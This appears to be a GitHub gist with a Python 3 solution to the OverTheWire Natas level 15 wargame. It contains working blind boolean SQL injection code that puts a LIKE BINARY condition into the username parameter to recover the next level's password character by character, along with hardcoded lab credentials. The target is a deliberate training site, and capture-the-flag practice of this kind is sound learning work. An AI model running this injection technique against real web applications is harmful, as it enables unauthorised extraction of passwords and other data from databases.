Skip to content

Instantly share code, notes, and snippets.

@Manoj-nathwani
Created March 17, 2016 20:19
Show Gist options
  • Save Manoj-nathwani/7f42f7c532bca9e808da to your computer and use it in GitHub Desktop.
Save Manoj-nathwani/7f42f7c532bca9e808da to your computer and use it in GitHub Desktop.
Natas15 using Python 3
# coding=utf-8
import requests, base64, ipdb
from bs4 import BeautifulSoup
username = 'natas15:'.encode()
password = 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'.encode()
url = 'http://natas15.natas.labs.overthewire.org'
chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
existsStr = 'This user exists.'.encode()
parsedChars = ''
next_level_password = ''
def connect():
global response
global headers
base_encoded_auth = base64.b64encode(username + password).decode('utf-8')
print(base_encoded_auth) # bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==
headers = {'Authorization': 'Basic {0}'.format(base_encoded_auth)}
response = requests.get(url, headers=headers)
# ipdb.set_trace()
def select_chars():
global parsedChars, next_level_password
if response.status_code != requests.codes.ok:
print('Can\'t connect')
else:
print('success')
for char in chars:
r = requests.get(url + '?username=natas16" AND password LIKE BINARY "%' + char + '%" "', headers=headers)
# print(r.text)
html_response_parser = BeautifulSoup(r.content, 'html.parser') # .get_text
# ipdb.set_trace()
# next required to read div content for some reason
if existsStr in html_response_parser.find("div", {"id": "content"}).next.encode():
parsedChars += char
print('Characters Used: ' + parsedChars + ' Starting brute force...')
def brute_force():
global next_level_password
# Assuming password is 32 characters long
for i in range(32):
for char in parsedChars:
req = requests.get(
url + '?username=natas16" AND password LIKE BINARY "' + next_level_password + char + '%" "',
headers=headers)
html_response_parser2 = BeautifulSoup(req.content, 'html.parser') # .get_text
if existsStr in html_response_parser2.find("div", {"id": "content"}).next.encode():
next_level_password += char
print('Password: ' + next_level_password + '*' * int(32 - len(next_level_password)))
break
connect()
select_chars()
brute_force()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment